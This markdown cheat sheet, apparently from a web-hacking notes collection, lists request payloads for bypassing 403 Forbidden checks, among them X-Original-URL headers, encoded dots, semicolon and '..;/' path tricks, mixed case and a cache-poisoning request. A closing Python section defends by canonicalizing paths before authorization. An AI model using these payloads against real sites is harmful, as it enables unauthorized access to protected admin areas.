Web_Hacking/403 Bypass.md
2023-09-15 16:18:51 +03:30


# Bypass 403 (Forbidden)
### Using the `X-Original-URL` header
```bash
# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com
# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
### Appending `%2e` after the first slash
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/%2e/admin
```
### Try adding a dot `.`, slash `/` or semicolon `;` to the URL
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret
```
### Add `..;/` after the directory name
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/admin..;/
```
### Try uppercasing letters in the URL
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/aDmIN
```
## Via Web Cache Poisoning
```bash
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
```
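Most of the variants above work because the component that enforces the 403 compares the raw request path while the component that serves the response normalizes it differently. As an added defensive example (not part of the original cheat sheet), the Python below canonicalizes a path before the authorization check and treats client-supplied path-override headers as part of the request to be authorized; the protected prefixes and the header list are assumptions for the illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed protected prefixes; the real list comes from the application's ACL.
PROTECTED = ("/admin", "/secret")

# Headers that some frameworks use to override the routed path. A reverse
# proxy should strip them at the edge; here they are authorized like the path.
PATH_OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def canonical_path(raw: str) -> str:
    """Reduce a request path to the form the ACL is written against.

    Covers the tricks listed on this page: percent-encoded dots (%2e),
    duplicate slashes, '.' and '..' segments, ';' path parameters and
    mixed case.
    """
    path = raw.split("?", 1)[0].split("#", 1)[0]
    # Decode repeatedly so a double-encoded %252e does not survive one pass.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop ';param' from every segment, so '/.;/x' becomes '/./x'.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # Collapse '//' and resolve '.'/'..'; normpath keeps a leading '//' on
    # POSIX, so force exactly one leading slash afterwards.
    path = "/" + posixpath.normpath("/" + path).lstrip("/")
    return path.lower()


def is_forbidden(raw_path: str, headers: dict) -> bool:
    """Deny when the canonical path, or any override header value, lands
    inside a protected prefix."""
    candidates = [raw_path] + [
        v for k, v in headers.items() if k.lower() in PATH_OVERRIDE_HEADERS
    ]
    for cand in candidates:
        canon = canonical_path(cand)
        if any(canon == p or canon.startswith(p + "/") for p in PROTECTED):
            return True
    return False
```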